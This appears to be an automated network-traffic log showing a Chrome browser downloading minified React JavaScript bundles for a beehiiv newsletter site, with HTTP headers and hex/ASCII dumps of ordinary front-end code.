                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 6c 61 73 73 4e 61 6d 65 3a 22 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 22 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 6a 73 78 73 28 66 2c 7b 61 73 3a 22 70 22 2c 73 69 7a 65 3a 22 78 73 22 2c 74 79 70 65 3a 22 62 6f 64 79 22 2c 74 68 65 6d 65 3a 22 64 65 66 61 75 6c 74 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 74 28 22 6c 6f 67 69 6e 2e 73 69 67 6e 5f 75 70 5f 6c 61 62 65 6c 22 29 2c 22 20 22 2c 65 2e 6a 73 78 28 77 2c 7b 74 6f 3a 22 2f 73 75 62 73 63 72 69 62 65 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 75 6e 64 65 72 6c 69 6e 65 22 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 6a 73 78 28 66 2c 7b 61 73 3a 22 73 70 61 6e 22 2c 73 69 7a 65 3a 22 78 73 22 2c 74 79 70 65 3a 22 62 6f 64 79 22 2c 77 65 69 67 68 74 3a 22 62 6f 6c 64 22 2c 74 68 65 6d 65 3a 22 64 65 66 61 75 6c 74 22 2c
                                                                                                                                            Data Ascii: lassName:"flex flex-col",children:e.jsxs(f,{as:"p",size:"xs",type:"body",theme:"default",children:[t("login.sign_up_label")," ",e.jsx(w,{to:"/subscribe",className:"underline",children:e.jsx(f,{as:"span",size:"xs",type:"body",weight:"bold",theme:"default",
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 66 69 78 65 64 20 69 6e 73 65 74 2d 30 20 62 6f 74 74 6f 6d 2d 30 20 6c 65 66 74 2d 30 20 7a 2d 32 30 20 62 67 2d 62 6c 61 63 6b 2f 36 30 22 7d 29 7d 29 2c 65 2e 6a 73 78 28 78 2e 43 68 69 6c 64 2c 7b 61 73 3a 64 2e 46 72 61 67 6d 65 6e 74 2c 65 6e 74 65 72 3a 22 65 61 73 65 2d 6f 75 74 20 64 75 72 61 74 69 6f 6e 2d 31 30 30 22 2c 65 6e 74 65 72 46 72 6f 6d 3a 22 74 72 61 6e 73 66 6f 72 6d 20 73 6d 3a 74 72 61 6e 73 6c 61 74 65 2d 79 2d 30 20 74 72 61 6e 73 6c 61 74 65 2d 79 2d 31 2f 32 20 6f 70 61 63 69 74 79 2d 30 22 2c 65 6e 74 65 72 54 6f 3a 22 74 72 61 6e 73 66 6f 72 6d 20 74 72 61 6e 73 6c 61 74 65 2d 79 2d 30 20 6f 70 61 63 69 74 79 2d 31 30 30 22 2c 6c 65 61 76 65 3a 22 65 61 73 65 2d 69 6e 20
                                                                                                                                            Data Ascii: "div",{className:"fixed inset-0 bottom-0 left-0 z-20 bg-black/60"})}),e.jsx(x.Child,{as:d.Fragment,enter:"ease-out duration-100",enterFrom:"transform sm:translate-y-0 translate-y-1/2 opacity-0",enterTo:"transform translate-y-0 opacity-100",leave:"ease-in
                                                                                                                                            2025-01-15 18:14:38 UTC650INData Raw: 74 43 6f 6f 6b 69 65 3a 72 2c 63 6f 6f 6b 69 65 73 53 65 74 3a 61 7d 29 3d 3e 7b 63 6f 6e 73 74 5b 74 2c 6e 5d 3d 6a 28 29 2c 6f 3d 4e 28 29 2c 6d 3d 6b 28 29 2c 69 3d 74 2e 67 65 74 28 22 6c 61 73 74 5f 72 65 73 6f 75 72 63 65 5f 67 75 69 64 22 29 7c 7c 73 2c 6c 3d 74 2e 67 65 74 28 22 61 64 6d 69 6e 5f 74 6f 6b 65 6e 22 29 2c 75 3d 74 2e 67 65 74 28 22 6a 77 74 5f 74 6f 6b 65 6e 22 29 2c 63 3d 6f 2e 68 61 73 68 21 3d 3d 22 22 2c 70 3d 74 2e 74 6f 53 74 72 69 6e 67 28 29 3b 64 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 69 66 28 61 26 26 69 29 69 66 28 72 28 7b 6e 61 6d 65 3a 22 6c 61 73 74 5f 72 65 73 6f 75 72 63 65 5f 67 75 69 64 22 2c 76 61 6c 75 65 3a 69 2c 64 61 79 73 3a 31 7d 29 2c 74 2e 64 65 6c 65 74 65 28 22 6c 61 73 74 5f 72 65 73 6f 75 72
                                                                                                                                            Data Ascii: tCookie:r,cookiesSet:a})=>{const[t,n]=j(),o=N(),m=k(),i=t.get("last_resource_guid")||s,l=t.get("admin_token"),u=t.get("jwt_token"),c=o.hash!=="",p=t.toString();d.useEffect(()=>{if(a&&i)if(r({name:"last_resource_guid",value:i,days:1}),t.delete("last_resour


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            107192.168.2.1649832104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:37 UTC550OUTGET /assets/index-DIU-Hrs1.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:38 UTC900INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:37 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 536
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"218-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b72a4c18b4-EWR
                                                                                                                                            2025-01-15 18:14:38 UTC469INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 30 63 36 31 31 66 34 39 2d 31 64 30 38 2d 35 62 33 35 2d 62 63 32 66 2d 35 35 66 33 62 64 34 36 31 32 37 30 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="0c611f49-1d08-5b35-bc2f-55f3bd461270")}catch(
                                                                                                                                            2025-01-15 18:14:38 UTC67INData Raw: 2d 44 49 55 2d 48 72 73 31 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 30 63 36 31 31 66 34 39 2d 31 64 30 38 2d 35 62 33 35 2d 62 63 32 66 2d 35 35 66 33 62 64 34 36 31 32 37 30 0a
                                                                                                                                            Data Ascii: -DIU-Hrs1.js.map//# debugId=0c611f49-1d08-5b35-bc2f-55f3bd461270


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            108192.168.2.1649834104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:37 UTC550OUTGET /assets/index-DcpNk-OI.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:38 UTC896INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:38 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 531
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736957253&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=thiarowrfoONgnyHKA7xULbVsTyDvMolM8SkUTaTzuU%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736957253&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=thiarowrfoONgnyHKA7xULbVsTyDvMolM8SkUTaTzuU%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"213-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b79f2b8cc3-EWR
                                                                                                                                            2025-01-15 18:14:38 UTC473INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 35 61 61 34 62 39 35 38 2d 36 33 30 36 2d 35 38 32 61 2d 61 34 65 65 2d 39 66 61 38 63 66 66 35 66 35 39 33 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="5aa4b958-6306-582a-a4ee-9fa8cff5f593")}catch(
                                                                                                                                            2025-01-15 18:14:38 UTC58INData Raw: 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 35 61 61 34 62 39 35 38 2d 36 33 30 36 2d 35 38 32 61 2d 61 34 65 65 2d 39 66 61 38 63 66 66 35 66 35 39 33 0a
                                                                                                                                            Data Ascii: .js.map//# debugId=5aa4b958-6306-582a-a4ee-9fa8cff5f593


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            109192.168.2.1649836104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:38 UTC552OUTGET /assets/popover-CV1J-FFp.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:38 UTC903INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:38 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 16040
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"3ea8-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b8abb24265-EWR
                                                                                                                                            2025-01-15 18:14:38 UTC466INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 34 38 36 36 35 62 36 66 2d 61 64 34 64 2d 35 32 62 35 2d 39 30 36 64 2d 35 32 34 37 65 35 61 36 32 36 31 65 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="48665b6f-ad4d-52b5-906d-5247e5a6261e")}catch(
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 69 6e 64 65 78 2d 44 36 64 61 39 70 36 2d 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 65 20 61 73 20 49 65 2c 4e 20 61 73 20 77 65 2c 45 20 61 73 20 45 65 2c 6e 20 61 73 20 66 65 2c 79 20 61 73 20 24 65 2c 73 20 61 73 20 44 7d 66 72 6f 6d 22 2e 2f 75 73 65 2d 72 6f 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 73 2d 44 6d 79 57 46 77 75 6f 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 4f 20 61 73 20 58 2c 55 20 61 73 20 59 2c 79 20 61 73 20 55 2c 63 20 61 73 20 54 65 2c 73 20 61 73 20 64 65 2c 6f 20 61 73 20 49 2c 75 20 61 73 20 48 2c 43 20 61 73 20 71 2c 49 20 61 73 20 7a 2c 61 20 61 73 20 41 2c 54 20 61 73 20 6b 65 2c 64 20 61 73 20 4e 65 2c 6c 20 61 73 20 4d 65 7d 66 72 6f 6d 22 2e 2f 6b 65 79 62 6f 61 72 64 2d 43 61 45 75 32 6f 30 75 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 6e 20 61
                                                                                                                                            Data Ascii: index-D6da9p6-.js";import{e as Ie,N as we,E as Ee,n as fe,y as $e,s as D}from"./use-root-containers-DmyWFwuo.js";import{O as X,U as Y,y as U,c as Te,s as de,o as I,u as H,C as q,I as z,a as A,T as ke,d as Ne,l as Me}from"./keyboard-CaEu2o0u.js";import{n a
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 61 6d 65 3a 65 2c 66 69 6c 6c 3a 74 7d 29 3d 3e 62 2e 6a 73 78 28 22 73 76 67 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 6c 65 28 65 29 2c 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 22 54 68 72 65 61 64 73 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 31 39 32 20 31 39 32 22 2c 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 66 69 6c 6c 3a 74 2c 63 68 69 6c 64 72 65 6e 3a 62 2e 6a 73 78 28 22 70 61 74 68 22 2c 7b 64 3a 22 4d 31 34 31 2e 35 33 37 20 38 38 2e 39 38 38 33 43 31 34 30 2e 37 31 20 38 38 2e 35 39 31 39 20 31 33 39 2e 38 37 20 38 38 2e 32 31 30 34 20 31 33 39 2e 30 31 39 20 38 37 2e 38 34 35 31 43 31 33 37 2e 35 33 37 20 36 30 2e 35 33 38 32 20 31 32 32 2e 36 31 36 20 34 34 2e 39 30 35 20 39 37 2e
                                                                                                                                            Data Ascii: ame:e,fill:t})=>b.jsx("svg",{className:le(e),"aria-label":"Threads",viewBox:"0 0 192 192",xmlns:"http://www.w3.org/2000/svg",fill:t,children:b.jsx("path",{d:"M141.537 88.9883C140.71 88.5919 139.87 88.2104 139.019 87.8451C137.537 60.5382 122.616 44.905 97.
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 39 35 20 30 48 39 36 2e 39 35 36 39 43 36 38 2e 38 38 31 36 20 30 2e 31 39 34 34 37 20 34 37 2e 32 39 32 31 20 39 2e 36 34 31 38 20 33 32 2e 37 38 38 33 20 32 38 2e 30 37 39 33 43 31 39 2e 38 38 31 39 20 34 34 2e 34 38 36 34 20 31 33 2e 32 32 34 34 20 36 37 2e 33 31 35 37 20 31 33 2e 30 30 30 37 20 39 35 2e 39 33 32 35 4c 31 33 20 39 36 4c 31 33 2e 30 30 30 37 20 39 36 2e 30 36 37 35 43 31 33 2e 32 32 34 34 20 31 32 34 2e 36 38 34 20 31 39 2e 38 38 31 39 20 31 34 37 2e 35 31 34 20 33 32 2e 37 38 38 33 20 31 36 33 2e 39 32 31 43 34 37 2e 32 39 32 31 20 31 38 32 2e 33 35 38 20 36 38 2e 38 38 31 36 20 31 39 31 2e 38 30 36 20 39 36 2e 39 35 36 39 20 31 39 32 48 39 37 2e 30 36 39 35 43 31 32 32 2e 30 33 20 31 39 31 2e 38 32 37 20 31 33 39 2e 36 32 34 20 31 38
                                                                                                                                            Data Ascii: 95 0H96.9569C68.8816 0.19447 47.2921 9.6418 32.7883 28.0793C19.8819 44.4864 13.2244 67.3157 13.0007 95.9325L13 96L13.0007 96.0675C13.2244 124.684 19.8819 147.514 32.7883 163.921C47.2921 182.358 68.8816 191.806 96.9569 192H97.0695C122.03 191.827 139.624 18
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 65 3a 22 61 62 73 6f 6c 75 74 65 20 6c 65 66 74 2d 30 20 74 6f 70 2d 30 20 68 2d 66 75 6c 6c 20 77 2d 66 75 6c 6c 20 72 6f 75 6e 64 65 64 2d 66 75 6c 6c 20 62 67 2d 62 6c 61 63 6b 20 6f 70 61 63 69 74 79 2d 31 30 22 7d 29 2c 62 2e 6a 73 78 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 72 6f 75 6e 64 65 64 2d 66 75 6c 6c 20 62 67 2d 62 6c 61 63 6b 20 70 2d 32 20 74 65 78 74 2d 77 68 69 74 65 22 2c 73 74 79 6c 65 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 50 2c 63 6f 6c 6f 72 3a 67 7d 2c 63 68 69 6c 64 72 65 6e 3a 74 7d 29 5d 7d 29 3a 6e 75 6c 6c 2c 68 74 3d 28 7b 70 75 62 6c 69 63 61 74 69 6f 6e 3a 65 2c 62 67 43 6f 6c 6f 72 3a 74 2c 66 69 6c 6c 43 6f 6c 6f 72 3a 63 7d 29 3d 3e 7b 63 6f 6e 73 74 7b 74 77 69 74 74 65 72 5f 75 72 6c 3a
                                                                                                                                            Data Ascii: e:"absolute left-0 top-0 h-full w-full rounded-full bg-black opacity-10"}),b.jsx("div",{className:"rounded-full bg-black p-2 text-white",style:{backgroundColor:P,color:g},children:t})]}):null,ht=({publication:e,bgColor:t,fillColor:c})=>{const{twitter_url:
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 2c 62 67 43 6f 6c 6f 72 3a 74 2c 66 69 6c 6c 43 6f 6c 6f 72 3a 63 7d 2c 54 2e 61 72 69 61 4c 61 62 65 6c 29 29 7d 29 7d 3b 76 61 72 20 47 65 3d 28 65 3d 3e 28 65 5b 65 2e 4f 70 65 6e 3d 30 5d 3d 22 4f 70 65 6e 22 2c 65 5b 65 2e 43 6c 6f 73 65 64 3d 31 5d 3d 22 43 6c 6f 73 65 64 22 2c 65 29 29 28 47 65 7c 7c 7b 7d 29 2c 48 65 3d 28 65 3d 3e 28 65 5b 65 2e 54 6f 67 67 6c 65 50 6f 70 6f 76 65 72 3d 30 5d 3d 22 54 6f 67 67 6c 65 50 6f 70 6f 76 65 72 22 2c 65 5b 65 2e 43 6c 6f 73 65 50 6f 70 6f 76 65 72 3d 31 5d 3d 22 43 6c 6f 73 65 50 6f 70 6f 76 65 72 22 2c 65 5b 65 2e 53 65 74 42 75 74 74 6f 6e 3d 32 5d 3d 22 53 65 74 42 75 74 74 6f 6e 22 2c 65 5b 65 2e 53 65 74 42 75 74 74 6f 6e 49 64 3d 33 5d 3d 22 53 65 74 42 75 74 74 6f 6e 49 64 22 2c 65 5b 65 2e 53 65
                                                                                                                                            Data Ascii: ,bgColor:t,fillColor:c},T.ariaLabel))})};var Ge=(e=>(e[e.Open=0]="Open",e[e.Closed=1]="Closed",e))(Ge||{}),He=(e=>(e[e.TogglePopover=0]="TogglePopover",e[e.ClosePopover=1]="ClosePopover",e[e.SetButton=2]="SetButton",e[e.SetButtonId=3]="SetButtonId",e[e.Se
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 6f 6e 74 65 78 74 28 6e 75 6c 6c 29 3b 74 65 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 50 6f 70 6f 76 65 72 50 61 6e 65 6c 43 6f 6e 74 65 78 74 22 3b 66 75 6e 63 74 69 6f 6e 20 55 65 28 29 7b 72 65 74 75 72 6e 20 61 2e 75 73 65 43 6f 6e 74 65 78 74 28 74 65 29 7d 66 75 6e 63 74 69 6f 6e 20 57 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 48 28 74 2e 74 79 70 65 2c 7a 65 2c 65 2c 74 29 7d 6c 65 74 20 5a 65 3d 22 64 69 76 22 3b 66 75 6e 63 74 69 6f 6e 20 4b 65 28 65 2c 74 29 7b 76 61 72 20 63 3b 6c 65 74 7b 5f 5f 64 65 6d 6f 4d 6f 64 65 3a 50 3d 21 31 2c 2e 2e 2e 67 7d 3d 65 2c 6c 3d 61 2e 75 73 65 52 65 66 28 6e 75 6c 6c 29 2c 72 3d 55 28 74 2c 54 65 28 75 3d 3e 7b 6c 2e 63 75 72 72 65 6e 74 3d 75 7d 29 29 2c 66 3d 61 2e 75 73 65 52 65 66 28 5b 5d 29 2c 76 3d
                                                                                                                                            Data Ascii: ontext(null);te.displayName="PopoverPanelContext";function Ue(){return a.useContext(te)}function We(e,t){return H(t.type,ze,e,t)}let Ze="div";function Ke(e,t){var c;let{__demoMode:P=!1,...g}=e,l=a.useRef(null),r=U(t,Te(u=>{l.current=u})),f=a.useRef([]),v=
                                                                                                                                            2025-01-15 18:14:38 UTC1369INData Raw: 75 72 72 65 6e 74 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 4d 2e 63 6f 6e 74 61 69 6e 73 29 21 3d 6e 75 6c 6c 26 26 56 2e 63 61 6c 6c 28 4d 2c 75 2e 74 61 72 67 65 74 29 7c 7c 28 4a 3d 28 4b 3d 79 2e 63 75 72 72 65 6e 74 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 4b 2e 63 6f 6e 74 61 69 6e 73 29 21 3d 6e 75 6c 6c 26 26 4a 2e 63 61 6c 6c 28 4b 2c 75 2e 74 61 72 67 65 74 29 7c 7c 73 28 7b 74 79 70 65 3a 31 7d 29 29 29 7d 2c 21 30 29 2c 4c 65 28 6f 2e 72 65 73 6f 6c 76 65 43 6f 6e 74 61 69 6e 65 72 73 2c 28 75 2c 4d 29 3d 3e 7b 73 28 7b 74 79 70 65 3a 31 7d 29 2c 46 65 28 4d 2c 5f 65 2e 4c 6f 6f 73 65 29 7c 7c 28 75 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 69 3f 2e 66 6f 63 75 73 28 29 29 7d 2c 68 3d 3d 3d 30 29 3b 6c 65 74 20 64 3d 49 28
                                                                                                                                            Data Ascii: urrent)==null?void 0:M.contains)!=null&&V.call(M,u.target)||(J=(K=y.current)==null?void 0:K.contains)!=null&&J.call(K,u.target)||s({type:1})))},!0),Le(o.resolveContainers,(u,M)=>{s({type:1}),Fe(M,_e.Loose)||(u.preventDefault(),i?.focus())},h===0);let d=I(
